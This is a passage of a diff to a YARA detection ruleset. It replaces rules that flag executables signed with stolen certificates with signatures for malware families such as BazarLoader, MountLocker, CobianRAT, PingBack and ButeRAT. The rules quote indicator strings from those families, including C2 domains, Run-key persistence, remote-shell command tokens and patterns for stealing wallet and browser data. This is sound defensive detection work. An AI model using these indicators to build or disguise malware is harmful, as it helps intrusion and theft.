+		$x1 = "VXNlci1BZ2VudA" ascii wide
+		$x2 = "cGFnZT17R1VJRH0mdj0x" ascii wide
+		$x3 = "0eXBlPXtHVUlEfSZ2PTE" ascii wide
+		$x4 = "tZXNzYWdlPXtHVUlEfSZ2PTE" ascii wide
+		$x5 = "L2VuLXVzL" ascii wide
+		$x6 = "L2VuLXVzL2luZGV4Lmh0bWw" ascii wide
+		$x7 = "L2VuLXVzL2RvY3MuaHRtbD" ascii wide
+		$s1 = "ExecuteStager" ascii
+		$s2 = "UseCertPinning" fullword ascii
+		$s3 = "FromBase64String" fullword ascii
+		$s4 = "ToBase64String" fullword ascii
+		$s5 = "DownloadString" fullword ascii
+		$s6 = "UploadString" fullword ascii
+		$s7 = "GetWebRequest" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Unicom Ltd" and pe.signatures [ i ] . serial == "00:fa:3d:ca:c1:9b:88:4b:44:ef:4f:81:54:11:84:d6:b0" )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or all of ( $s* ) or ( 1 of ( $x* ) and 5 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_70E1Ebd170Db8102D8C28E58392E5632 : FILE
+rule DITEKSHEN_MALWARE_Win_Fabookie : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Fabookie / ElysiumStealer"
 		author = "ditekSHen"
-		id = "f5ccfbdd-d72d-5060-84e6-0ab8477f73fe"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "dfa653c4-37d9-5e31-9c47-23adf751e4aa"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1439-L1450"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5608-L5624"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b639424c97fb1da440c458cf5cb8f04562292284db7b576c0676a632704f597b"
+		logic_hash = "bbe10323817d501a361a33abf61a49ad59fcac69d78d9d9ec1744ee99a4b4629"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "90d67006be03f2254e1da76d4ea7dc24372c4f30b652857890f9d9a391e9279c"
-		importance = 20
+
+	strings:
+		$s1 = "rwinssyslog" fullword wide
+		$s2 = "_kasssperskdy" fullword wide
+		$s3 = "[Title:%s]" fullword wide
+		$s4 = "[Execute]" fullword wide
+		$s5 = "[Snapshot]" fullword wide
+		$s6 = "Mozilla/4.0 (compatible)" fullword wide
+		$s7 = "d-k netsvcs" fullword wide
+		$s8 = "facebook.websmails.com" fullword wide
+		$s9 = "CUdpClient::Start" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Equal Cash Technologies Limited" and pe.signatures [ i ] . serial == "70:e1:eb:d1:70:db:81:02:d8:c2:8e:58:39:2e:56:32" )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x0805 ) and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_6Cfa5050C819C4Acbb8Fa75979688Dff : FILE
+rule DITEKSHEN_MALWARE_Win_Cobianrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects CobianRAT, a fork of Njrat"
 		author = "ditekSHen"
-		id = "35673979-5578-5d32-b8f9-9e74f0c336a2"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "5a9b6f04-fc52-52a9-b72f-d24dd093e886"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1452-L1463"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5626-L5640"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e5978deb84a0c6cee9132f8806f239f33478462da31a423a04922c195cbd343a"
+		logic_hash = "5c8f55e5328b61c3591c876797b4521f8e98af7a6c53bab918f10d5c3c2b5013"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e7241394097402bf9e32c87cada4ba5e0d1e9923f028683713c2f339f6f59fa9"
-		importance = 20
+
+	strings:
+		$s1 = "1.0.40.7" fullword wide
+		$s2 = "DownloadData" fullword wide
+		$s3 = "Executed As" fullword wide
+		$s4 = "\\Plugins" fullword wide
+		$s5 = "LOGIN" fullword wide
+		$s6 = "software\\microsoft\\windows\\currentversion\\run" wide
+		$s7 = "Hidden" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Elite Web Development Ltd." and pe.signatures [ i ] . serial == "6c:fa:50:50:c8:19:c4:ac:bb:8f:a7:59:79:68:8d:ff" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00B8164F7143E1A313003Ab0C834562F1F : FILE
+rule DITEKSHEN_MALWARE_Win_Leivion : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Leivion"
 		author = "ditekSHen"
-		id = "d6ebdfb9-55db-58e2-89a8-d47d747e3432"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "77800add-8fff-5657-9ed6-a23517bce0b1"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1465-L1476"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5660-L5673"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "77f8f125740de97e6fdd98103eefa2a431df0cbe2e7de44f7e863e22ebcfea4c"
+		logic_hash = "a0cda23df4301b66feedad7c04b4d051c07474ccaa07c05598dd0b47bb6fc7e6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "263c636c5de68f0cd2adf31b7aebc18a5e00fc47a5e2124e2a5613b9a0247c1e"
-		importance = 20
+
+	strings:
+		$s1 = "/var/lib/veil/go/src/runtime/mem_windows.go" fullword ascii
+		$s2 = "/var/lib/veil/go/src/internal/singleflight/singleflight.go" fullword ascii
+		$s3 = "/var/lib/veil/go/src/net/http/sniff.go" fullword ascii
+		$s4 = "/var/lib/veil/go/src/net/sendfile_windows.go" fullword ascii
+		$s5 = "/var/lib/veil/go/src/os/exec_" ascii
+		$s6 = "/var/lib/veil/go/src/runtime/mgcsweep.go" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ekitai Data Inc." and pe.signatures [ i ] . serial == "00:b8:16:4f:71:43:e1:a3:13:00:3a:b0:c8:34:56:2f:1f" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_E3C7Cc0950152E9Ceead4304D01F6C89 : FILE
+rule DITEKSHEN_MALWARE_Win_Banload : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Banload"
 		author = "ditekSHen"
-		id = "8bea34fa-3620-5f5f-895f-3baa3b7b458a"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "4672bce1-1280-576d-b7df-f0181a854058"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1478-L1489"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5675-L5688"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "395ed4c9c8668f6416632f85883c5fd5b6038ce8388410f22bcbe2a9e6281c35"
+		logic_hash = "5cbc69d11b73f60d6eee3f23ed6cc217ba37a3408cb69e396e0394b5a1e20b75"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "82975e3e21e8fd37bb723de6fdb6e18df9d0e55f0067cc77dd571a52025c6724"
-		importance = 20
+
+	strings:
+		$s1 = "main.die" fullword ascii
+		$s2 = "main.postResults" fullword ascii
+		$s3 = "main.checkin" fullword ascii
+		$s4 = "RegQueryValueExWRemoveDirectoryWSETTINGS_TIMEOUTTerminateProcessUpgrade RequiredUser-Agent: %s" ascii
+		$s5 = "pcuser-agentws2_32.dll (targetpc= DigestType ErrCode=%v" ascii
+		$s6 = "invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrie" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DNS KOMPLEKT" and pe.signatures [ i ] . serial == "e3:c7:cc:09:50:15:2e:9c:ee:ad:43:04:d0:1f:6c:89" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_6A241Ffe96A6349Df608D22C02942268 : FILE
+rule DITEKSHEN_MALWARE_Win_TYRAT : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects TYRAT"
 		author = "ditekSHen"
-		id = "571f5f11-576a-511b-975d-0643ae834502"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "316c50cc-964e-5d24-b169-7a09fdf61638"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1491-L1502"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5690-L5703"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "41db1a9b11e2d5b8de5ba81496d0e76ea5eddacc01c77bc28c7e05496842df04"
+		logic_hash = "b733b7aa3ba1195807fb728453c0f3f4df2177836054af6f7a863e14058884cb"
 		score = 75
-		quality = 75
+		quality = 25
 		tags = "FILE"
-		thumbprint = "f97f4b9953124091a5053712b2c22b845b587cb2655156dcafed202fa7ceeeb1"
-		importance = 20
+
+	strings:
+		$s1 = "C:\\$MSIRecycle.Bin\\" fullword ascii
+		$s2 = "Range: bytes=%d-" fullword ascii
+		$s3 = "GET%sHTTP/1.1" fullword ascii
+		$s4 = "DllServer.dll" fullword ascii
+		$s5 = ".Bin\\bnch" ascii
+		$s6 = "User-Agent: wget" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HELP, d.o.o." and pe.signatures [ i ] . serial == "6a:24:1f:fe:96:a6:34:9d:f6:08:d2:2c:02:94:22:68" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00C04F5D17Af872Cb2C37E3367Fe761D0D : FILE
+rule DITEKSHEN_MALWARE_Win_Infinitylock : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects InfinityLock ransomware"
 		author = "ditekSHen"
-		id = "9d008f04-8d02-5c6b-b38d-234409cce277"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "7a66cc19-c635-580b-abc2-b58bd48673bd"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1504-L1518"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5705-L5723"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7fa0d16600ae89e41d7b2b0655b142ea36202e8bbbf5f8e25cbb45a005995e79"
+		logic_hash = "634759f1c2d48becebc9c87e146e898524071738f74b7001b112dc793bcb581c"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "7f52ece50576fcc7d66e028ecec89d3faedeeedb953935e215aac4215c9f4d63"
-		importance = 20
+
+	strings:
+		$s1 = "_Encrypted$" fullword ascii
+		$s2 = "PublicKeyToken=" fullword ascii nocase
+		$s3 = "GenerateHWID" fullword ascii
+		$s4 = "CreateKey" fullword ascii
+		$d1 = "ProgrammFiles" fullword ascii
+		$d2 = "OneDrive" fullword ascii
+		$d3 = "ProgrammsX86" fullword ascii
+		$d4 = "UserDirs" fullword ascii
+		$d5 = "B_Drive" fullword ascii
+		$pdb1 = "F:\\DESKTOP!\\ChkDsk\\ChkDsk\\obj\\" ascii
+		$pdb2 = "\\ChkDsk\\obj\\Debug\\PremiereCrack.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DES SP Z O O" and ( pe.signatures [ i ] . serial == "00:c0:4f:5d:17:af:87:2c:b2:c3:7e:33:67:fe:76:1d:0d" or pe.signatures [ i ] . serial == "c0:4f:5d:17:af:87:2c:b2:c3:7e:33:67:fe:76:1d:0d" ) )
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $s* ) and 1 of ( $d* ) ) or ( 4 of ( $d* ) and 2 of ( $s* ) ) or ( any of ( $pdb* ) and 1 of ( $s* ) and 1 of ( $d* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_5C7E78F53C31D6Aa5B45De14B47Eb5C4 : FILE
+rule DITEKSHEN_MALWARE_Win_Mountlocker : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects MountLocker ransomware"
 		author = "ditekSHen"
-		id = "e6bd4476-d287-54d9-82b3-d80f328d7831"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "0590d08d-1ee8-5dfe-af12-15b149acd2d6"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1520-L1531"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5725-L5740"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0c804e7f1e43a98b150a97adcbba882f7764000abdf7c7408e3361aefa9298b5"
+		logic_hash = "30bc601fef60cc1c9d8bff5dd3f8a53214f088b74eb24fe2369f5664613e0eaf"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f91d436c1c7084b83007f032ef48fecda382ff8b81320212adb81e462976ad5a"
-		importance = 20
+
+	strings:
+		$s1 = "] locker.dir.check > " ascii wide
+		$s2 = "] locekr.kill." ascii wide
+		$s3 = "] locker.worm" ascii wide
+		$s4 = "%CLIENT_ID%" fullword ascii
+		$s5 = "RecoveryManual.html" ascii wide
+		$s6 = "RECOVERY MANUAL" ascii
+		$s7 = ".ReadManual.%0.8X" ascii wide
+		$s8 = "/?cid=%CLIENT_ID%" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cubic Information Systems, UAB" and pe.signatures [ i ] . serial == "5c:7e:78:f5:3c:31:d6:aa:5b:45:de:14:b4:7e:b5:c4" )
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_7156Ec47Ef01Ab8359Ef4304E5Af1A05 : FILE
+rule DITEKSHEN_MALWARE_Win_Pingback : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects PingBack ICMP backdoor"
 		author = "ditekSHen"
-		id = "f77ccdb6-77b6-5c47-bde6-2b1b449f9533"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "ecb313b6-f923-5b6d-a4d7-a4650817ed84"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1533-L1544"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5742-L5761"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fc8073ebb9847d642f15cc74859b643afe00b3c331f68c06f3ff62c037225201"
+		logic_hash = "c5fa9ecefca1188ba5e81c0518f74023884ad0f66718fc030601cb458bdf2f12"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "59fe580974e2f813c2a00b4be01acd46c94fdea89a3049433cd5ba5a2d96666d"
-		importance = 20
+
+	strings:
+		$s1 = "Sniffer ok!" fullword ascii
+		$s2 = "recv icmp packet!" fullword ascii
+		$s3 = "WSASocket() failed: %d" fullword ascii
+		$s4 = "file on remote computers success" ascii
+		$s5 = "listen port error!" fullword ascii
+		$s6 = "\\PingBackService" ascii
+		$c1 = "exec" fullword ascii
+		$c2 = "rexec" fullword ascii
+		$c3 = "exep" fullword ascii
+		$c4 = "download" fullword ascii
+		$c5 = "upload" fullword ascii
+		$c6 = "shell" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BOREC, OOO" and pe.signatures [ i ] . serial == "71:56:ec:47:ef:01:ab:83:59:ef:43:04:e5:af:1a:05" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or all of ( $c* ) or ( 4 of ( $c* ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00B2E730B0526F36Faf7D093D48D6D9997 : FILE
+rule DITEKSHEN_MALWARE_Win_Bazarloader : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects BazarLoader variants"
 		author = "ditekSHen"
-		id = "7c74d3aa-dc4f-51ed-9574-74e0539cd22b"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "6282df59-7244-501f-bb60-09a2a519bd47"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1546-L1557"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5763-L5776"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "16c50b7a2b7b55662d5cdb2261a6b352657b2689a9328916fcf63ddfbef5d08f"
+		logic_hash = "8febd1355bc03f71794ffb8d51cbb112e8acd2d26fec5bb736a388d5384e7747"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "10dd41eb9225b615e6e4f1dce6690bd2c8d055f07d4238db902f3263e62a04a9"
-		importance = 20
+
+	strings:
+		$s1 = "Startdelay for %d ms to avoid some dynamic AV detects!" ascii
+		$s2 = "Use Debug for moving faster!" ascii
+		$s3 = "Logging Mutex %s to %s" ascii
+		$s4 = "FIRST AND ONLY COPY RUNNING! Mutex %s" ascii
+		$s5 = "the most secret 3d GetWinApiPointers line in the world!" ascii
+		$s6 = "[+] makeMD5hash. " ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bamboo Connect s.r.o." and pe.signatures [ i ] . serial == "00:b2:e7:30:b0:52:6f:36:fa:f7:d0:93:d4:8d:6d:99:97" )
+		uint16( 0 ) == 0x5a4d and 3 of ( $s* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_2C90Eaf4De3Afc03Ba924C719435C2A3 : FILE
+rule DITEKSHEN_MALWARE_Win_Coinminer01 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects coinmining malware"
 		author = "ditekSHen"
-		id = "0b1ae208-bf81-55d0-b4e5-b1c1f7556387"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "739e7cea-c6b6-5add-86d4-382b00e2b645"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1559-L1570"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5778-L5790"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "792898b34ebe4dfc603b3f3b54777a86827a52fd3699a799e95c436317be77da"
+		logic_hash = "31a7531ecc7b8a35ba882c17d15bd3581e65b4b99dd3a7cb8bca8f6edf204114"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "6b916111ffbd6736afa569d7d940ada544daf3b18213a0da3025b20973a577dc"
-		importance = 20
+
+	strings:
+		$s1 = "-o pool." ascii wide
+		$s2 = "--cpu-max-threads-hint" ascii wide
+		$s3 = "-P stratum" ascii wide
+		$s4 = "--farm-retries" ascii wide
+		$dl = "github.com/ethereum-mining/ethminer/releases/download" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AntiFIX s.r.o." and pe.signatures [ i ] . serial == "2c:90:ea:f4:de:3a:fc:03:ba:92:4c:71:94:35:c2:a3" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or ( $dl ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Bdc81Bc76090Dae0Eee2E1Eb744A4F9A : FILE
+rule DITEKSHEN_PUA_Win_Ultrasurf : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects UltraSurf / Ultrareach PUA"
 		author = "ditekSHen"
-		id = "9c91e39e-a120-537d-a24c-f0b8ffe9dd6e"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "ba0f6867-bddc-5e72-978c-8e29b1b6b709"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1572-L1583"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5792-L5807"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "90c695b0cffd4786471faca21b77161ae6e930540766c4f18796a7adea74b6f5"
+		logic_hash = "d8d17b1bf20c12f864697d3dd66f345a8b93e2a75f0489b58b23b7f5264b6be3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a3b0a1cd3998688f294838758688f96adee7d5aa98ec43709b8868d6914e96c1"
-		importance = 20
 
-	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALM4U GmbH" and pe.signatures [ i ] . serial == "00:bd:c8:1b:c7:60:90:da:e0:ee:e2:e1:eb:74:4a:4f:9a" )
-}
+	strings:
+		$s1 = "Ultrareach Internet Corp." ascii
+		$s2 = "UltrasurfUnionRectUrlFixupWUse Proxy" ascii
+		$s3 = "Ultrasurf UnlockFileUrlEscapeWUser-Agent" ascii wide
+		$s4 = "Ultrasurf0#" ascii
+		$m1 = "main.bindata_read" fullword ascii
+		$m2 = "main.icon64_png" fullword ascii
+		$m3 = "main.setProxy" fullword ascii
+		$m4 = "main.openbrowser" fullword ascii
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00E38259Cf24Cc702Ce441B683Ad578911 : FILE
+	condition:
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $s* ) or ( all of ( $m* ) and 1 of ( $s* ) ) )
+}
+rule DITEKSHEN_MALWARE_Win_Hello : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Hunt for Hello / WickrMe ransomware"
 		author = "ditekSHen"
-		id = "79e00e92-4ddb-5f87-8f60-78f326674c66"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "99c11aab-8a3a-5e10-9af0-542e55129d51"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1585-L1596"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5809-L5820"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "53d135553b88484e2c40976a9eaa0eb3f4f34c40ce775c198dfd6552155d1859"
+		logic_hash = "f52f12eb38613f5afd5258b5263c6e6e2d9db6c9659a769f896a2bb66564fa69"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "16304d4840d34a641f58fe7c94a7927e1ba4b3936638164525bedc5a406529f8"
-		importance = 20
+
+	strings:
+		$s1 = "DeleteBackupFiles" ascii wide
+		$s2 = "GetEncryptFiles" ascii wide
+		$s3 = "DeleteVirtualDisks" ascii wide
+		$s4 = "DismountVirtualDisks" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Akhirah Technologies Inc." and pe.signatures [ i ] . serial == "00:e3:82:59:cf:24:cc:70:2c:e4:41:b6:83:ad:57:89:11" )
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_4929Ab561C812Af93Ddb9758B545F546 : FILE
+rule DITEKSHEN_MALWARE_Win_Buterat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects ButeRAT"
 		author = "ditekSHen"
-		id = "e57e442a-6fe3-5d09-bbc4-d290a7a80090"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "74f63d61-6589-5fb1-864a-3a02ddd57ebc"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1598-L1609"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5822-L5839"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a03f37840b24456a4a2ef8e7c456dc99396886682156e4e95f7547bf38d8dc4d"
+		logic_hash = "c3d93e8dc1bde8e77c11586c8d8b67d137ef2c4791e12269f1af310fbe14832b"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "0946bf998f8a463a1c167637537f3eba35205b748efc444a2e7f935dc8dd6dc7"
-		importance = 20
+
+	strings:
+		$x1 = "TVqQAAMAA" ascii
+		$s1 = "ipinfo.io/geo" wide
+		$s2 = "/index.php" wide
+		$s3 = "Copy-Item -Path" wide
+		$s4 = ";Start-Process" wide
+		$s5 = "Microsoft\\Windows\\Start Menu\\Programs\\Startup" wide
+		$s6 = "LOCALAPPDATA" fullword wide
+		$s7 = "passwords.json" wide
+		$s8 = "Scripting.FileSystemObject" fullword wide
+		$z1 = /(edge|chrome|opera|exodus|jaxx|atomic|coinomi)\.zip/ ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Everything Wow s.r.o." and pe.signatures [ i ] . serial == "49:29:ab:56:1c:81:2a:f9:3d:db:97:58:b5:45:f5:46" )
